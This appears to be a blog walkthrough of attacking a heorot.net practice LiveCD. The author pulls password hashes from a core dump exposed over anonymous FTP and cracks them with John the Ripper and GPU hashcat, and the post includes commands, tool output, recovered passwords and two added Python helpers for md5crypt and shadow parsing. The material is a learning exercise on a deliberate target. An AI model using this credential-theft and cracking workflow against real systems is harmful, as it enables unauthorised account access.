Recently I have been learning pentesting using a LiveCD which can be downloaded from heorot.net. In my opinion heorot.net has done those of us learning pentesting a great favour by creating safe targets to learn and practise on.
I need to thank g0tmi1k for sharing the walkthrough.
Understanding the liveCD
Nmap scan report for 192.168.1.110
Host is up (0.00053s latency).
Scanned at 2012-01-26 17:07:16 SGT for 9s
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.4
22/tcp filtered ssh
80/tcp open http Apache httpd 2.2.4 ((Unix) mod_ssl/2.2.4 OpenSSL/0.9.8b DAV/2)
631/tcp open ipp CUPS 1.1
From the preliminary reconnaissance I have learned that the LiveCD exposes ftp (21), http (80) and CUPS/ipp (631). Port 22 (ssh) shows as filtered, so it is being blocked somewhere on the path and is not usable as an entry point at this stage.
Exploring ftp
root@bt:~# ftp 192.168.1.110
Connected to 192.168.1.110.
220 (vsFTPd 2.0.4)
Name (192.168.1.110:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
The FTP server accepts anonymous logins (any password, including an empty one, is accepted). Now I will explore the LiveCD's filesystem through FTP.
Directory listing of /download/etc/:
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 6 1000 513 340 Mar 15 2007 .
drwxr-xr-x 7 1000 513 160 Mar 15 2007 ..
drwxr-xr-x 4 1000 513 160 Mar 15 2007 X11
-rw-r--r-- 1 1000 513 362436 Mar 03 2007 core
drwxr-xr-x 2 1000 513 100 Mar 15 2007 fonts
-rw-r--r-- 1 1000 513 780 Apr 30 2005 hosts
-rw-r--r-- 1 1000 513 718 Jul 03 2005 inputrc
-rw-r--r-- 1 1000 513 1296 Jun 10 2006 issue
-rw-r--r-- 1 1000 513 183 Jun 23 2005 lisarc
-rw-r--r-- 1 1000 513 56 Oct 21 2004 localtime
lrwxrwxrwx 1 1000 513 23 Jan 26 07:15 localtime-copied-from -> /usr/share/zoneinfo/GMT
-rw-r--r-- 1 1000 513 10289 Dec 31 2003 login.defs
-rw-r--r-- 1 1000 513 1 Dec 31 2003 motd-slax
drwxr-xr-x 2 1000 513 100 Mar 15 2007 profile.d
drwxr-xr-x 2 1000 513 220 Mar 15 2007 rc.d
-rw-r--r-- 1 1000 513 440 Jul 18 2006 shadow
226 Directory send OK.
ftp>
Two files in this listing should never be exposed to the public: core and shadow. The core file is a core dump of a process, and as the next step shows it contains the contents of the shadow file, i.e. the password hashes of the LiveCD. Both are world-readable here and served to an anonymous FTP user.
Download the core dump
ftp> get core
local: core remote: core
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for core (362436 bytes).
226 File send OK.
362436 bytes received in 0.02 secs (15004.5 kB/s)
ftp> bye
221 Goodbye.
The core dump is a binary file full of bytes a text editor cannot display, so I use the strings command to pull out the printable text:
command: strings core
<truncated output; the shadow entries appear at the end of the file>
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::smmsp:*:9797:0:::::mysql:*:9797:0:::::rpc:*:9797:0:::::sshd:*:9797:0:::::gdm:*:9797:0:::::pop:*:9797:0:::::nobody:*:9797:0:::::aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
Arrange the usernames and hashes one entry per line. Only four accounts have a real $1$ hash; the accounts whose password field is * are locked and cannot be cracked, so I leave them out. I created a shadow.txt file holding the four usable entries:
root@bt:~# cat /home/tmp/shadow.txt
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::
bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::
ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
Many walkthroughs use John the Ripper. JtR is a great cracking tool and handles FreeBSD MD5 (md5crypt) hashes, but on this machine cracking with a good wordlist is extremely slow: I waited for more than 5 hours and still not even one password was found. Here is how I ran it:
root@bt:~# cd /pentest/passwords/john/
root@bt:/pentest/passwords/john#
root@bt:/pentest/passwords/john# ./john --wordlist=/pentest/passwords/wordlists/wordlist.txt --rules /home/tmp/shadow.txt
Loaded 4 password hashes with 4 different salts (FreeBSD MD5 [8x])
Remaining 1 password hash
The process takes so long not because of JtR itself but because it is running on the CPU, where the rate is about 1700 c/s. Note that c/s is candidate passwords hashed per second, not characters per second:
guesses: 0 time: 0:00:00:53 0.53% (ETA: Thu Jan 26 20:07:19 2012) c/s: 1728 trying: fibulocalcaneal - fichi
This will take forever...
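The c/s figure is low because one candidate costs far more than a single MD5. The following is an added example (not code from this post, from JtR or from hashcat) that reimplements the FreeBSD md5crypt algorithm behind these $1$ hashes in Python: every candidate means a setup pass plus 1000 chained MD5 computations, and that loop is what both tools spend their time on. The known-answer check in the main block is hashcat's published example hash for mode 500 (plaintext "hashcat"); the second check uses the bbanter hash from this post.

```python
"""md5crypt ($1$) reimplemented to show why each candidate is expensive.

Added example, not the post's own code.  The algorithm is Poul-Henning
Kamp's FreeBSD md5crypt, the format JtR calls "FreeBSD MD5" and hashcat
calls md5crypt (-m 500).  One candidate costs 1000 dependent MD5
computations on top of the setup, so thousands of c/s is the expected
order of magnitude, not millions as for raw MD5.
"""
import hashlib
import hmac

MAGIC = "$1$"
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
ROUNDS = 1000  # fixed by the algorithm; md5crypt has no rounds= parameter


def _to64(value: int, count: int) -> str:
    """Encode `count` 6-bit groups of `value`, least significant group first."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def md5crypt(password: str, salt: str) -> str:
    """Return the full "$1$<salt>$<22 chars>" string for password and salt."""
    pw = password.encode()
    sl = salt[:8].encode()  # md5crypt uses at most 8 salt characters

    ctx = hashlib.md5(pw + MAGIC.encode() + sl)

    # Alternate sum MD5(pw + salt + pw), fed in len(pw) bytes in total.
    alt = hashlib.md5(pw + sl + pw).digest()
    remaining = len(pw)
    while remaining > 0:
        ctx.update(alt[: min(16, remaining)])
        remaining -= 16

    # For each bit of len(pw): a NUL byte if the bit is set, else pw[0].
    i = len(pw)
    while i:
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()

    # The expensive part: 1000 MD5 computations that each depend on the last,
    # so they cannot be parallelised within one candidate.
    for r in range(ROUNDS):
        ctx1 = hashlib.md5()
        ctx1.update(pw if r & 1 else final)
        if r % 3:
            ctx1.update(sl)
        if r % 7:
            ctx1.update(pw)
        ctx1.update(final if r & 1 else pw)
        final = ctx1.digest()

    # md5crypt's own byte ordering: five 24-bit groups, then byte 11 alone.
    encoded = ""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        encoded += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    encoded += _to64(final[11], 2)
    return MAGIC + sl.decode() + "$" + encoded


def salt_of(hash_string: str) -> str:
    """Extract the salt from "$1$salt$digest"; reject other formats."""
    if not hash_string.startswith(MAGIC):
        raise ValueError("not an md5crypt hash")
    return hash_string.split("$")[2]


def verify(password: str, hash_string: str) -> bool:
    """Constant-time check of a candidate against a stored md5crypt hash."""
    candidate = md5crypt(password, salt_of(hash_string))
    return hmac.compare_digest(candidate.encode(), hash_string.encode())


if __name__ == "__main__":
    # hashcat's published -m 500 example hash, plaintext "hashcat".
    print(verify("hashcat", "$1$28772684$iEwNOgGugqO9.bIz5sk8k/"))
    # The bbanter entry from shadow.txt and the word recovered for it below.
    print(verify("Zymurgy", "$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1"))
```

verify() lets you confirm a cracked word against its shadow entry without re-running the cracker. Timing a loop of md5crypt() calls on the CPU gives a rough idea of the per-core rate, and the 1000 rounds are fixed by the algorithm, so the only things that change the cost per candidate are the password length and the hardware.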
Hash / password cracking using GPU power
I had previously spent several hours installing the NVIDIA drivers; the reason I was determined to sort that out is that I wanted to use a GPU and see for myself how much it speeds up the process. The tool I used is cudaHashcat-plus (cudaHashcat64). Note that oclHashcat64 is the build for ATI/AMD GPUs and cudaHashcat64 is the build for NVIDIA GPUs.
For this I create another file, shadow.hash, which contains only the salted hashes, one per line, since that is what hashcat reads:
root@bt:/pentest/passwords/oclhashcat+# cat /home/tmp/shadow.hash
$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30
$1$klZ09iws$fQDiqXfQXBErilgdRyogn.
$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1
$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/
The order of the hashes is the same as in shadow.txt so that I can relate each result back to its username. Note that the -o output file holds hash:plaintext lines in the order they were cracked, not the input order, so the reliable way to map results back is by hash value rather than by line position.
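Rebuilding shadow.txt and shadow.hash by hand and then matching cracked.txt back to usernames is error-prone, so here is an added example (not code from this post) that does it programmatically. It takes the run-together shadow text exactly as strings printed it above, splits it strictly and in order into one entry per user, keeps only the accounts that actually carry a hash, produces both the john-style shadow lines and the hash-only lines for hashcat, and maps hash:plaintext output lines back to usernames by hash value. The cracked lines are constructed in the layout hashcat writes with -o, using two of the results reported later in this post.

```python
"""Re-split shadow entries recovered from `strings core` and map cracked
hashes back to users.  Added example, not the post's own code."""
import re

# Copied from the strings output above.  The newlines were lost, so all 24
# shadow entries are glued together on one line.
SHADOW_BLOB = (
    "root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::"
    "bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::"
    "sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::"
    "news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::"
    "ftp:*:9797:0:::::smmsp:*:9797:0:::::mysql:*:9797:0:::::rpc:*:9797:0:::::"
    "sshd:*:9797:0:::::gdm:*:9797:0:::::pop:*:9797:0:::::nobody:*:9797:0:::::"
    "aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::"
    "bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::"
    "ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::"
)

# Constructed to look like hashcat's -o output (hash:plaintext), using two of
# the results this post reports for the wordlist run.
CRACKED_LINES = [
    "$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:Diatomaceous",
    "$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:Zymurgy",
]

# A shadow(5) entry has 9 colon-separated fields.  The 9th (reserved) field is
# empty in this dump, so once the newline is gone each entry is 8 fields and
# the next username follows the 8th colon directly.  The parser matches only
# at the current offset, so a username-looking substring inside a hash can
# never be picked up as the start of an entry.
ENTRY = re.compile(
    r"(?P<user>[A-Za-z_][A-Za-z0-9_.-]*):"  # login name
    r"(?P<hash>[^:]*):"                     # $1$..., * (locked) or empty
    r"(?P<lastchg>\d*):(?P<min>\d*):(?P<max>\d*):"
    r"(?P<warn>\d*):(?P<inactive>\d*):(?P<expire>\d*):"
)


def parse_shadow_blob(blob):
    """Split concatenated shadow text into a list of field dicts, in order."""
    entries = []
    pos = 0
    while pos < len(blob):
        m = ENTRY.match(blob, pos)
        if not m:
            snippet = blob[pos:pos + 40]
            raise ValueError(f"unparseable shadow data at offset {pos}: {snippet!r}")
        entries.append(m.groupdict())
        pos = m.end()
    return entries


def crackable(entries):
    """Keep only entries with a real hash; '*' and '!' mark locked accounts."""
    return [e for e in entries if e["hash"] and not e["hash"].startswith(("*", "!"))]


def shadow_lines(entries):
    """One shadow(5) line per user, the layout john reads (shadow.txt above)."""
    fields = ("user", "hash", "lastchg", "min", "max", "warn", "inactive", "expire")
    return [":".join([e[f] for f in fields] + [""]) for e in entries]


def hash_lines(entries):
    """Hash-only lines for hashcat (shadow.hash above), same order as shadow_lines()."""
    return [e["hash"] for e in entries]


def join_cracked(entries, cracked_lines):
    """Map hashcat's hash:plaintext lines back to usernames by hash value."""
    by_hash = {e["hash"]: e["user"] for e in entries}
    result = {}
    for line in cracked_lines:
        line = line.rstrip("\n")
        if not line:
            continue
        # The hash can never contain ':', so split at the first one only;
        # this keeps plaintexts that themselves contain ':' intact.
        h, _, plain = line.partition(":")
        if h not in by_hash:
            raise ValueError(f"cracked hash not in shadow data: {h}")
        result[by_hash[h]] = plain
    return result


if __name__ == "__main__":
    users = crackable(parse_shadow_blob(SHADOW_BLOB))
    print("\n".join(shadow_lines(users)))
    print("\n".join(hash_lines(users)))
    print(join_cracked(users, CRACKED_LINES))
```

Writing shadow_lines() to shadow.txt and hash_lines() to shadow.hash reproduces the two files used in this post; feeding the lines of cracked.txt to join_cracked() gives the username:plaintext pairs without relying on line order.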
root@bt:/pentest/passwords/oclhashcat+# ./cudaHashcat-plus64.bin -m 500 -o /home/tmp/cracked.txt /home/tmp/shadow.hash /pentest/passwords/wordlists/wordlist.txt -r rules/toggles1.rule
-m 500 : this defines the hash type; 500 is md5crypt, the $1$ MD5-based crypt also known as FreeBSD MD5.
-o : file to output.
-r : rules.
Followed by hash file and dictionary file.
cudaHashcat-plus v0.07 by atom starting...
Hashes: 4
Unique salts: 4
Unique digests: 4
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
Rules: 15
GPU-Loops: 64
GPU-Accel: 1
Password lengths range: 1 - 15
Platform: NVidia compatible platform found
Watchdog: Temperature limit set to 90c
Device #1: GeForce G210M, 511MB, 1468Mhz, 2MCU
Device #1: Allocating 0MB host-memory
Device #1: Kernel ./kernels/4318/m0500.sm_12.64.cubin
Scanned dictionary /pentest/passwords/wordlists/wordlist.txt: 3453259 bytes, 306319 words, 4594785 keyspace, starting attack…
Status.......: Running
Input.Mode...: File (/pentest/passwords/wordlists/wordlist.txt)
Hash.Type....: md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
Time.Running.: 1 min, 25 secs
Time.Left....: 11 mins, 23 secs
Time.Util....: 85138.4ms/122.1ms Real/CPU, 0.1% idle
Speed........: 22924 c/s Real, 22944 c/s GPU
Recovered....: 0/4 Digests, 0/4 Salts
Progress.....: 3347096/18379140 (18.21%)
Rejected.....: 1395352/3347096 (41.69%)
HW.Monitor.#1: 0% GPU, 65c Temp
Notice the speed: about 22,000 c/s (candidates per second) on the GPU, against about 1,700 c/s on the CPU with JtR, roughly 13 times faster. Also note the Rejected counter: candidates that fall outside the supported password length range (1 to 15 here) are dropped before they are ever hashed, so a wordlist with many long words wastes a large part of its keyspace.
Increase the GPU workload
root@bt:/pentest/passwords/oclhashcat+# ./cudaHashcat-plus64.bin -m 500 -o /home/tmp/cracked.txt /home/tmp/shadow.hash /pentest/passwords/wordlists/wordlist.txt -r rules/combinator.rule -n 160
-n 160 : sets GPU-Accel (the workload tuning factor) to 160 instead of the default 1, so each kernel launch processes many more candidates. It is not a thread count. Note that this run also switches to rules/combinator.rule (40 rules instead of 15), so the keyspace is larger than in the previous run.
Hashes: 4
Unique salts: 4
Unique digests: 4
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
Rules: 40
GPU-Loops: 64
GPU-Accel: 160
Password lengths range: 1 - 15
Platform: NVidia compatible platform found
Watchdog: Temperature limit set to 90c
Device #1: GeForce G210M, 511MB, 1468Mhz, 2MCU
Device #1: Allocating 48MB host-memory
Device #1: Kernel ./kernels/4318/m0500.sm_12.64.cubin
Status.......: Running
Input.Mode...: File (/pentest/passwords/wordlists/wordlist.txt)
Hash.Type....: md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
Time.Running.: 1 min, 15 secs
Time.Left....: 23 mins, 15 secs
Time.Util....: 75939.1ms/229.8ms Real/CPU, 0.3% idle
Speed........: 33442 c/s Real, 34407 c/s GPU
Recovered....: 0/4 Digests, 0/4 Salts
Progress.....: 2944068/49011040 (6.01%)
Rejected.....: 404548/2944068 (13.74%)
HW.Monitor.#1: 0% GPU, 68c Temp
Notice the speed has increased by roughly 10,000 c/s (about 34,000 against 23,000). The keyspace has also grown, from about 18 million to 49 million candidates, because the rule file changed from toggles1 (15 rules) to combinator (40 rules); that is why Time.Left is longer despite the higher rate. With a good wordlist, cracking time can still be reduced significantly. The final status once the dictionary was exhausted:
Status.......: Exhausted
Input.Mode...: File (/pentest/passwords/wordlists/wordlist.txt)
Hash.Type....: md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
Time.Running.: 17 mins, 24 secs
Time.Left....: 0 secs
Time.Util....: 1044021.4ms/2808.8ms Real/CPU, 0.3% idle
Speed........: 34497 c/s Real, 34464 c/s GPU
Recovered....: 2/4 Digests, 2/4 Salts
Progress.....: 49011040/49011040 (100.00%)
Rejected.....: 12995029/49011040 (26.51%)
HW.Monitor.#1: 0% GPU, 65c Temp
Started: Thu Jan 26 17:41:38 2012
Stopped: Thu Jan 26 17:59:04 2012
cudaHashcat-plus took 17 minutes on the GPU; with my own wordlist it recovered two of the four hashes. Matching the hash:plaintext lines in cracked.txt back to the usernames in shadow.txt gives:
ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:Diatomaceous
bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:Zymurgy
No root password in my wordlist I guess….:)
Using the darkc0de.lst wordlist I could also recover the root password:
Status.......: Exhausted
Input.Mode...: File (/pentest/passwords/wordlists/darkc0de.lst)
Hash.Type....: md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
Time.Running.: 53 mins, 1 sec
Time.Left....: 0 secs
Time.Util....: 3181609.8ms/14450.3ms Real/CPU, 0.5% idle
Speed........: 34520 c/s Real, 34628 c/s GPU
Recovered....: 3/4 Digests, 3/4 Salts
Progress.....: 273220960/273220960 (100.00%)
Rejected.....: 163391085/273220960 (59.80%)
HW.Monitor.#1: 0% GPU, 64c Temp
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:Complexity
bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:Zymurgy
ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:Diatomaceous
The aadams hash is the only one still uncracked after both wordlists (3/4 digests recovered).